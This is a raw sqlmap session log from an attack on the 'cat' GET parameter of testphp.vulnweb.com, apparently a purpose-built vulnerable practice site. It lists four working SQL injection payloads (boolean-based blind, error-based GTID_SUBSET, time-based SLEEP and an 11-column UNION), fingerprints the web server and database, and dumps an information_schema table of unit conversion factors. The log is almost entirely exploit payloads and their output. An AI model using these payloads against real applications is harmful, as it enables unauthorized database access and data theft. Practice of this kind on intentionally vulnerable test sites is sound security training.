        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.8.3.13#dev}
|_ -| . [']     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 21:55:26 /2024-04-02/

[21:55:27] [INFO] resuming back-end DBMS 'mysql' 
[21:55:27] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: cat (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cat=1 AND 9179=9179

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: cat=1 AND GTID_SUBSET(CONCAT(0x7162787171,(SELECT (ELT(4926=4926,1))),0x717a7a7871),4926)

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: cat=1 AND (SELECT 9205 FROM (SELECT(SLEEP(5)))AmqV)

    Type: UNION query
    Title: Generic UNION query (NULL) - 11 columns
    Payload: cat=1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7162787171,0x4143725672454556666d4d4544474d62696e4e674d55437446544d686279745162706d5447645252,0x717a7a7871),NULL,NULL,NULL-- -
---
[21:55:27] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Nginx 1.19.0, PHP 5.6.40
back-end DBMS: MySQL >= 5.6
[21:55:27] [INFO] fetching columns for table 'ST_UNITS_OF_MEASURE' in database 'information_schema'
[21:55:28] [INFO] fetching entries for table 'ST_UNITS_OF_MEASURE' in database 'information_schema'
Database: information_schema
Table: ST_UNITS_OF_MEASURE
[47 entries]
+--------------------------------------+-----------+---------------+---------------------+
| UNIT_NAME                            | UNIT_TYPE | DESCRIPTION   | CONVERSION_FACTOR   |
+--------------------------------------+-----------+---------------+---------------------+
| British chain (Sears 1922 truncated) | LINEAR    | <blank>       | 20.116756           |
| British foot (Sears 1922 truncated)  | LINEAR    | <blank>       | 0.30479933333333337 |
| chain                                | LINEAR    | <blank>       | 20.1168             |
| yard                                 | LINEAR    | <blank>       | 0.9144              |
| British foot (1936)                  | LINEAR    | <blank>       | 0.3048007491        |
| British link (Sears 1922 truncated)  | LINEAR    | <blank>       | 0.20116756          |
| Gold Coast foot                      | LINEAR    | <blank>       | 0.3047997101815088  |
| Indian yard (1937)                   | LINEAR    | <blank>       | 0.91439523          |
| link                                 | LINEAR    | <blank>       | 0.201168            |
| Indian yard                          | LINEAR    | <blank>       | 0.9143985307444408  |
| Indian yard (1975)                   | LINEAR    | <blank>       | 0.9143985           |
| Indian yard (1962)                   | LINEAR    | <blank>       | 0.9143988           |
| Indian foot (1975)                   | LINEAR    | <blank>       | 0.3047995           |
| Indian foot (1937)                   | LINEAR    | <blank>       | 0.30479841          |
| Indian foot                          | LINEAR    | <blank>       | 0.30479951024814694 |
| Indian foot (1962)                   | LINEAR    | <blank>       | 0.3047996           |
| British foot (1865)                  | LINEAR    | <blank>       | 0.30480083333333335 |
| British link (Benoit 1895 B)         | LINEAR    | <blank>       | 0.2011678249437587  |
| Statute mile                         | LINEAR    | <blank>       | 1609.344            |
| British chain (Benoit 1895 B)        | LINEAR    | <blank>       | 20.116782494375872  |
| British foot (Benoit 1895 B)         | LINEAR    | <blank>       | 0.30479973476327077 |
| British link (Benoit 1895 A)         | LINEAR    | <blank>       | 0.201167824         |
| nautical mile                        | LINEAR    | <blank>       | 1852                |
| US survey link                       | LINEAR    | <blank>       | 0.2011684023368047  |
| metre                                | LINEAR    | <blank>       | 1                   |
| US survey chain                      | LINEAR    | <blank>       | 20.11684023368047   |
| fathom                               | LINEAR    | <blank>       | 1.8288              |
| German legal metre                   | LINEAR    | <blank>       | 1.0000135965        |
| Clarke's foot                        | LINEAR    | <blank>       | 0.3047972654        |
| British link (Sears 1922)            | LINEAR    | <blank>       | 0.2011676512155263  |
| British foot (Sears 1922)            | LINEAR    | <blank>       | 0.3047994715386762  |
| millimetre                           | LINEAR    | <blank>       | 0.001               |
| US survey mile                       | LINEAR    | <blank>       | 1609.3472186944375  |
| centimetre                           | LINEAR    | <blank>       | 0.01                |
| British yard (Sears 1922)            | LINEAR    | <blank>       | 0.9143984146160288  |
| US survey foot                       | LINEAR    | <blank>       | 0.30480060960121924 |
| kilometre                            | LINEAR    | <blank>       | 1000                |
| Clarke's yard                        | LINEAR    | <blank>       | 0.9143917962        |
| British chain (Benoit 1895 A)        | LINEAR    | <blank>       | 20.1167824          |
| Clarke's chain                       | LINEAR    | <blank>       | 20.1166195164       |
| Clarke's link                        | LINEAR    | <blank>       | 0.201166195164      |
| British chain (Sears 1922)           | LINEAR    | <blank>       | 20.116765121552632  |
| British yard (Benoit 1895 A)         | LINEAR    | <blank>       | 0.9143992           |
| British yard (Sears 1922 truncated)  | LINEAR    | <blank>       | 0.914398            |
| British yard (Benoit 1895 B)         | LINEAR    | <blank>       | 0.9143992042898124  |
| foot                                 | LINEAR    | <blank>       | 0.3048              |
| British foot (Benoit 1895 A)         | LINEAR    | <blank>       | 0.3047997333333333  |
+--------------------------------------+-----------+---------------+---------------------+

[21:55:28] [INFO] table 'information_schema.ST_UNITS_OF_MEASURE' dumped to CSV file '/Users/min/.local/share/sqlmap/output/testphp.vulnweb.com/dump/information_schema/ST_UNITS_OF_MEASURE.csv'
[21:55:28] [INFO] fetched data logged to text files under '/Users/min/.local/share/sqlmap/output/testphp.vulnweb.com'

[*] ending @ 21:55:28 /2024-04-02/

